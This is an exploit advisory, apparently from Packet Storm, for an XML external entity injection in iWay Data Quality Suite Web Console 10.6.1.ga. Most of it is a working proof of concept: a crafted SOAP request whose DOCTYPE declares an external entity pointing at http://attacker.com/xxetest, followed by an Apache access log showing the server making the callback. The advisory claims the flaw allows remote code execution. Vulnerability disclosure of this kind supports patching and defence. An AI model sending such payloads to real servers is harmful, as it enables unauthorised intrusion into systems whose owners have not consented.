iWay Data Quality Suite Web Console 10.6.1.ga XML Injection

2018-09-27T00:00:00
ID PACKETSTORM:149578
Type packetstorm
Reporter Sureshbabu Narvaneni
Modified 2018-09-27T00:00:00

Description

                                        
                                            `# Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 a XML External Entity Injection  
# Google Dork: N/A  
# Date: 2018-09-27  
# Exploit Author: Sureshbabu Narvaneni#  
# Author Blog : https://nullnews.in  
# Vendor Homepage: www.informationbuilders.co.uk  
# Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite  
# Affected Version: 10.6.1.ga  
# Category: WebApps  
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686  
# CVE : N/A  
  
# Technical Description:  
# iWay Data Quality Suite Web Console provides web services features. As there is no  
# validation present on the web services featured by product while processing  
# the user input an attacker can easily inject external entities in the SOAP request and can   
# achieve the successful Remote Code Execution on the server  
  
# Proof Of Concept:  
  
> Access the iWay DQS Web Console application section.  
> Create an entry for web service and form a sample SOAP request.  
> Send below crafted request to the server to confirm the vulnerability  
  
<?xml version="1.0"?>  
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://attacker.com/xxetest">]>  
<soapenv:Envelope  
xml:soapenv="http://schemas.xmlsoap.org/soap/envelope"  
xmlns:ws="http://www.example.com/ws">  
<soapenv:Header/>  
<soapenv:Body>  
<ws:test>  
<ws:in>&xxe;</ws:in>  
</ws:test>  
</soapenv:Body>  
</soapenv:Envelope>  
  
> The below log shows that the web service component is vulnerable to XXE.  
  
root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log  
1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404  
474 "-" "-"  
  
`